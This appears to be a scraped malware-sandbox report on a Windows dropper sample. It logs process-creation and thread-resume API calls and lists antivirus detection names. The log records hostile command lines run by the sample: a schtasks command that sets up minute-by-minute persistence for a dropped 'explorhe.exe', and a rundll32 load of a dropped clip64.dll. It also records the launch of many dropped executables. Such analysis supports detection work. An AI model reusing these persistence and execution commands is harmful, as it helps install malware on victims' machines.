        
          67634196
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000134
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000288
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2208
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2172
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x000002a0
        
      
      
      

    
  
    
      process_identifier:
      
        
          2664
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Program Files\Mozilla Firefox\firefox.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Program Files\Mozilla Firefox\firefox.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634196
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000002c8
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x000002a0
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2664
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000214
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          3012
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          812
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000334
        
      
      
      

    
  
    
      process_identifier:
      
        
          604
        
      
      
      

    
  
    
      current_directory:
      
        
          
        
      
      
      

    
  
    
      filepath:
      
        
          
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3012 CREDAT:145409
        
      
      
      

    
  
    
      filepath_r:
      
        
          
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          4
        
      
      
        (CREATE_SUSPENDED)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000338
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000334
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          604
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000424
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          3012
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000290
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          3012
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtGetContextThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000198
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x000001f8
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          604
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000022c
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          604
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000024c
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          604
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x000007a4
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          604
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000011c
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2488
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2624
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000338
        
      
      
      

    
  
    
      process_identifier:
      
        
          2628
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000340
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000114
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2628
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000264
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2628
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          2748
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000288
        
      
      
      

    
  
    
      process_identifier:
      
        
          2752
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Windows\System32\schtasks.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Windows\System32\schtasks.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000290
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          1376
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x000003c0
        
      
      
      

    
  
    
      process_identifier:
      
        
          1316
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000003dc
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          3380
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000408
        
      
      
      

    
  
    
      process_identifier:
      
        
          3376
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Windows\System32\rundll32.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Windows\System32\rundll32.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000420
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          3564
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x000003c4
        
      
      
      

    
  
    
      process_identifier:
      
        
          3560
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000582001\moto.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000003ec
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          3216
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x000003d8
        
      
      
      

    
  
    
      process_identifier:
      
        
          3228
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\1000583001\store.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000583001\store.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000003dc
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          3708
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000404
        
      
      
      

    
  
    
      process_identifier:
      
        
          3716
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000586001\TrueCrypt_NKwtUN.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000003dc
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          3664
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x000003e4
        
      
      
      

    
  
    
      process_identifier:
      
        
          1772
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000589001\kskskfsf.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000003dc
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          1924
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x000003e0
        
      
      
      

    
  
    
      process_identifier:
      
        
          4092
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000590001\latestrocki.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x00000414
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          4512
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x000003c4
        
      
      
      

    
  
    
      process_identifier:
      
        
          4508
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000591001\gold1234.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000023c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          4728
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000160
        
      
      
      

    
  
    
      process_identifier:
      
        
          4724
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000592001\crypted.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000003d8
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          4848
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x000003e0
        
      
      
      

    
  
    
      process_identifier:
      
        
          4844
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000595001\rdx1122.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000003d8
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          5116
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x000003ec
        
      
      
      

    
  
    
      process_identifier:
      
        
          5112
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000597001\alex.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000003d8
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
CreateProcessInternalW

  
  
    
      
    
  


  
    
      thread_identifier:
      
        
          4276
        
      
      
      

    
  
    
      thread_handle:
      
        
          0x00000160
        
      
      
      

    
  
    
      process_identifier:
      
        
          4116
        
      
      
      

    
  
    
      current_directory:
      
        
          C:\Users\test22\AppData\Local\Temp\jobA4Qh0McSylYafz9
        
      
      
      

    
  
    
      filepath:
      
        
          C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
        
      
      
      

    
  
    
      track:
      
        
          1
        
      
      
      

    
  
    
      command_line:
      
        
          "C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe" 
        
      
      
      

    
  
    
      filepath_r:
      
        
          C:\Users\test22\AppData\Local\Temp\1000600001\leg221.exe
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      creation_flags:
      
        
          67634192
        
      
      
        (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
      
      

    
  
    
      inherit_handles:
      
        
          0
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000003d8
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    Bkav
                                    W32.AIDetectMalware
                                    
                                


                            

                        

                            

                                

                                    Elastic
                                    malicious (high confidence)
                                    
                                


                            

                        

                            

                                

                                    Cynet
                                    Malicious (score: 100)
                                    
                                


                            

                        

                            

                                

                                    ALYac
                                    Gen:Variant.Ser.Zusy.4824
                                    
                                


                            

                        

                            

                                

                                    Cylance
                                    unsafe
                                    
                                


                            

                        

                            

                                

                                    VIPRE
                                    Gen:Variant.Ser.Zusy.4824
                                    
                                


                            

                        

                            

                                

                                    Sangfor
                                    Suspicious.Win32.Save.ins
                                    
                                


                            

                        

                            

                                

                                    K7AntiVirus
                                    Virus ( f10000101 )
                                    
                                


                            

                        

                            

                                

                                    BitDefender
                                    Gen:Variant.Ser.Zusy.4824
                                    
                                


                            

                        

                            

                                

                                    K7GW
                                    Virus ( f10000101 )
                                    
                                


                            

                        

                            

                                

                                    Cybereason
                                    malicious.4895a0
                                    
                                


                            

                        

                            

                                

                                    Arcabit
                                    Trojan.Ser.Zusy.D12D8
                                    
                                


                            

                        

                            

                                

                                    Symantec
                                    ML.Attribute.HighConfidence
                                    
                                


                            

                        

                            

                                

                                    tehtris
                                    Generic.Malware
                                    
                                


                            

                        

                            

                                

                                    ESET-NOD32
                                    a variant of Win32/Packed.Enigma.AAF
                                    
                                


                            

                        

                            

                                

                                    APEX
                                    Malicious
                                    
                                


                            

                        

                            

                                

                                    Avast
                                    WAT:Blacked-E
                                    
                                


                            

                        

                            

                                

                                    ClamAV
                                    Win.Trojan.Scar-6903585-0
                                    
                                


                            

                        

                            

                                

                                    Kaspersky
                                    UDS:DangerousObject.Multi.Generic
                                    
                                


                            

                        

                            

                                

                                    MicroWorld-eScan
                                    Gen:Variant.Ser.Zusy.4824
                                    
                                


                            

                        

                            

                                

                                    Emsisoft
                                    Gen:Variant.Ser.Zusy.4824 (B)
                                    
                                


                            

                        

                            

                                

                                    FireEye
                                    Generic.mg.04301ab0e3daa0be
                                    
                                


                            

                        

                            

                                

                                    Ikarus
                                    Trojan.Win32.VBKrypt
                                    
                                


                            

                        

                            

                                

                                    Google
                                    Detected
                                    
                                


                            

                        

                            

                                

                                    MAX
                                    malware (ai score=88)
                                    
                                


                            

                        

                            

                                

                                    Antiy-AVL
                                    Trojan[Packed]/Win32.Enigma
                                    
                                


                            

                        

                            

                                

                                    Microsoft
                                    Trojan:Win32/Sabsik.RD.A!ml
                                    
                                


                            

                        

                            

                                

                                    ZoneAlarm
                                    UDS:DangerousObject.Multi.Generic
                                    
                                


                            

                        

                            

                                

                                    GData
                                    Gen:Variant.Ser.Zusy.4824
                                    
                                


                            

                        

                            

                                

                                    Varist
                                    W32/Threat-HLLIE-based!Maximus
                                    
                                


                            

                        

                            

                                

                                    BitDefenderTheta
                                    Gen:NN.ZexaF.36680.jHW@aG3hERdk
                                    
                                


                            

                        

                            

                                

                                    DeepInstinct
                                    MALICIOUS
                                    
                                


                            

                        

                            

                                

                                    VBA32
                                    BScope.Trojan.Bitrep
                                    
                                


                            

                        

                            

                                

                                    Malwarebytes
                                    Generic.Malware.AI.DDS
                                    
                                


                            

                        

                            

                                

                                    Panda
                                    Trj/Genetic.gen
                                    
                                


                            

                        

                            

                                

                                    Zoner
                                    Probably Heur.ExeHeaderL
                                    
                                


                            

                        

                            

                                

                                    SentinelOne
                                    Static AI - Malicious PE
                                    
                                


                            

                        

                            

                                

                                    AVG
                                    WAT:Blacked-E
                                    
                                


                            

                        

                            

                                

                                    CrowdStrike
                                    win/malicious_confidence_90% (D)